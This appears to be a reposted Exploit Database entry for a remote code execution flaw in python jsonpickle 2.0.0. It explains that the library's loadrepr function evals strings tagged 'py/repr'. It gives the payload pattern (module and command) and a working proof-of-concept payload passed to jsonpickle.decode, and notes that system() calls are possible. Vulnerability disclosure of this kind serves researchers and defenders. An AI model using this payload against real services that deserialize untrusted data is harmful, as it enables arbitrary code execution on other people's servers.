python jsonpickle 2.0.0 – Remote Code Execution

• Exploit Database
• 15 阅读

• 作者： Adi Malyanker
  日期： 2021-02-24
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49585/

• # Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution
  # Date: 24-2-2021
  # Vendor Homepage: https://jsonpickle.github.io
  # Exploit Author: Adi Malyanker, Shay Reuven
  # Software Link: https://github.com/jsonpickle/jsonpickle
  # Version: 2.0.0
  # Tested on: windows, linux
  
  # 	Python is an open source language. jsonickle module is provided to convert objects into a serialized form, 
  # 	and later recover the data back into an object. the decode is used to undeserialize serialized strings.
  
  # 	If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls. 
  # 	the problem is in the inner function loadrepr function which eval each serialized string which contains "py/repr".
  
  #	The vulnerability exists from the first version till the current version for backward compatibility. no patch is provided yet
  
  #	the payload was found during our research made on deserialization functions.
  
  # 	the pattern should be :
  # 	{..{"py/repr":<the module to import>/<the command to be executed.>}..}
  
  # 	example:
  
  malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'
  
  # 	the command on the server side
  some_parameter = jsonpickle.decode(malicious)